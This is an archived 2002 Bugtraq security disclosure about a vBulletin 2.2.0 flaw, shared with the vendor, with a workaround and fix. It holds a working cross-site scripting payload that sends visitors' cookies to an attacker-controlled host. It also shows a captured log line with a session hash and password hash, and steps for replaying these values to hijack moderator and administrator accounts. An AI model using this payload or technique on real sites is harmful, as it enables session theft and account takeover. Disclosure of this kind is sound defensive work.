Fairly serious vulnerability in vBulletin 2.2.0

From: HarryM (harrym@the-group.org)
Date: Wed Jan 30 2002 - 20:18:23 PST

Next message: palanteat_private: "msdtc on 3372"

Previous message: Chris Anley: "New SQL Injection Whitepaper"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is my first report to bugtraq, I hope this is useful. This has been
tested on vBulletin version 2.2.0. The vendor is CC'd on this message. I
would imagine this applies to many products, not just the vbulletin, which I
would like to say is more secure than most.

------------
The Exploit:
------------

It involves a few different parts, firstly some malicious scripting and then
tricking the forum into accepting data from the wrong place.

First, I post some malicious html in a reply to a topic that allows HTML:

        <script>document.write('<img
src="http://my_ip_address/'+document.cookie+'">';</script>

When someone loads the page, the javascript echoes the contents of their
cookies into the image source tag that points to a webserver on my machine,
resulting in this kind of line in my access log:

        GET
/bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi
sit=1011983161

At first I thought this was useless since the forum uses a one-way
encryption hash to protect the password... however, then it occurred that If
I log out and clear my cookies, I can add these variables into the url of
any page and the forum will use those variables to log me in transparently,
just like it ordinarily does when you leave the forum and come back. So I
added the variables to the url and bingo, it logged me in as a moderator of
the forum, who was being my guinea pig.

From here, I can log onto his profile, change his email address to mine, use
the forgotten password utility to have his password emailed to me. Obviously
in this user's case this is fairly useless, but if I had caught an
administrator's cookie info from the malicious javascript, I could get their
password, giving me access to the CP... and that's that.

-------------
Workaround:
-------------

Disable html, make sure that there is absolutely nowhere on the page where
html can be echoed onto a page. Disable the [img] tag for good measure.

---------
Solution:
---------

Ensure that $bbuserid, $bbpassword, and the rest of the cookied variables
are coming from the cookie and not from GET or POST data, by using the
$HTTP_COOKIE array.

Harry Metcalfe

Next message: palanteat_private: "msdtc on 3372"
Previous message: Chris Anley: "New SQL Injection Whitepaper"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 31 2002 - 14:14:32 PST